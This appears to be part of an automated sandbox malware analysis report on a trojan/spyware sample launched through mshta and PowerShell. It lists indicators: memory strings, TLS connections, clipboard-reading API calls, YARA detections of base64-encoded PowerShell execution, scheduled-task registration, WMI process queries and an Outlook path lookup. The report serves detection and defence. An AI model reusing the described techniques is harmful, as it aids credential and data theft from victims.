Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zappos.com/cart
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zazzle.com/co/cart
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zennioptical.com/shoppingCart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www2.hm.com/en_us/cart
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 172.67.223.7:443 -> 192.168.11.20:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.37.173:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49776 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 8_2_004329C0
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 8_2_004329C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041B2E0 CreateDesktopW, 8_2_0041B2E0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C9F758 NtResumeThread, 6_2_06C9F758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C9F750 NtResumeThread, 6_2_06C9F750
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00948050 3_2_00948050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00948920 3_2_00948920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00947D08 3_2_00947D08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B7D30 6_2_006B7D30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B4640 6_2_006B4640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B4650 6_2_006B4650
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B4607 6_2_006B4607
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006BB7E8 6_2_006BB7E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0093A603 6_2_0093A603
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0093761E 6_2_0093761E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00937628 6_2_00937628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0093E708 6_2_0093E708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_009338F8 6_2_009338F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_009338E8 6_2_009338E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00938BED 6_2_00938BED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00938CCB 6_2_00938CCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00933E90 6_2_00933E90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00933E80 6_2_00933E80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00E0B180 6_2_00E0B180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C315F0 6_2_06C315F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C327F8 6_2_06C327F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C31917 6_2_06C31917
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C797A8 6_2_06C797A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C773B0 6_2_06C773B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C762C0 6_2_06C762C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C762B1 6_2_06C762B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C7F3F0 6_2_06C7F3F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C7C7F8 6_2_06C7C7F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C79799 6_2_06C79799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C773A0 6_2_06C773A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C7B8A8 6_2_06C7B8A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C718B0 6_2_06C718B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C7B8B8 6_2_06C7B8B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C77574 6_2_06C77574
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C90040 6_2_06C90040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C90006 6_2_06C90006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C97918 6_2_06C97918
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C97928 6_2_06C97928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E667B8 6_2_06E667B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E67328 6_2_06E67328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E66A30 6_2_06E66A30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E67639 6_2_06E67639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E667A8 6_2_06E667A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E66B55 6_2_06E66B55
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E66875 6_2_06E66875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E60040 6_2_06E60040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E66020 6_2_06E66020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E6683A 6_2_06E6683A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E60006 6_2_06E60006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E67800 6_2_06E67800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E66010 6_2_06E66010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E66D21 6_2_06E66D21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_082E0022 6_2_082E0022
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_082E0040 6_2_082E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_082EF6B0 6_2_082EF6B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00408850 8_2_00408850
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00423860 8_2_00423860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00438810 8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004218A0 8_2_004218A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042DA53 8_2_0042DA53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041B2E0 8_2_0041B2E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0040ACF0 8_2_0040ACF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00417DEE 8_2_00417DEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00437DF0 8_2_00437DF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00409580 8_2_00409580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041759F 8_2_0041759F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043AEC0 8_2_0043AEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004266D0 8_2_004266D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041E7C0 8_2_0041E7C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00415799 8_2_00415799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041682D 8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004288CB 8_2_004288CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043D880 8_2_0043D880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00430940 8_2_00430940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00403970 8_2_00403970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00420939 8_2_00420939
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004179C1 8_2_004179C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004231C2 8_2_004231C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004241C0 8_2_004241C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043B1D0 8_2_0043B1D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004291DD 8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043D980 8_2_0043D980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00405990 8_2_00405990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00422190 8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043D997 8_2_0043D997
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043D999 8_2_0043D999
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004091B0 8_2_004091B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042CA49 8_2_0042CA49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00416263 8_2_00416263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0040EA10 8_2_0040EA10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00415220 8_2_00415220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042CAD0 8_2_0042CAD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004252DD 8_2_004252DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00406280 8_2_00406280
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043DA80 8_2_0043DA80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041E290 8_2_0041E290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041CB40 8_2_0041CB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043D34D 8_2_0043D34D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00426B50 8_2_00426B50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043DB60 8_2_0043DB60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00436B08 8_2_00436B08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042830D 8_2_0042830D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042CB11 8_2_0042CB11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00404320 8_2_00404320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042CB22 8_2_0042CB22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00425327 8_2_00425327
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00408330 8_2_00408330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043F330 8_2_0043F330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042A33F 8_2_0042A33F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0040DBD9 8_2_0040DBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00424380 8_2_00424380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041FC75 8_2_0041FC75
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041DC00 8_2_0041DC00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00429C2B 8_2_00429C2B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004291DD 8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004074F0 8_2_004074F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041148F 8_2_0041148F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042AC90 8_2_0042AC90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043ECA0 8_2_0043ECA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0040CD46 8_2_0040CD46
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00437500 8_2_00437500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00422510 8_2_00422510
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00425E70 8_2_00425E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00436E74 8_2_00436E74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00427603 8_2_00427603
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00425E30 8_2_00425E30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004286C0 8_2_004286C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004236E2 8_2_004236E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00405EE0 8_2_00405EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0041DE80 8_2_0041DE80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00402F50 8_2_00402F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00420F50 8_2_00420F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00438F59 8_2_00438F59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00406710 8_2_00406710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00423F20 8_2_00423F20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043F720 8_2_0043F720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00419F30 8_2_00419F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004197C2 8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0042DFE9 8_2_0042DFE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0040A780 8_2_0040A780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00411F90 8_2_00411F90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00418792 8_2_00418792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043EFB0 8_2_0043EFB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: String function: 00408030 appears 42 times
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: String function: 00414400 appears 65 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Very long command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 3792
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 3792 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 6.2.powershell.exe.7590000.1.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 6.2.powershell.exe.7590000.1.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 6.2.powershell.exe.7590000.1.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 6.2.powershell.exe.7590000.1.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.win@26/9@5/7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 8_2_00437DF0
Source: C:\Windows\SysWOW64\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Ruiexf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvoifloc.let.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
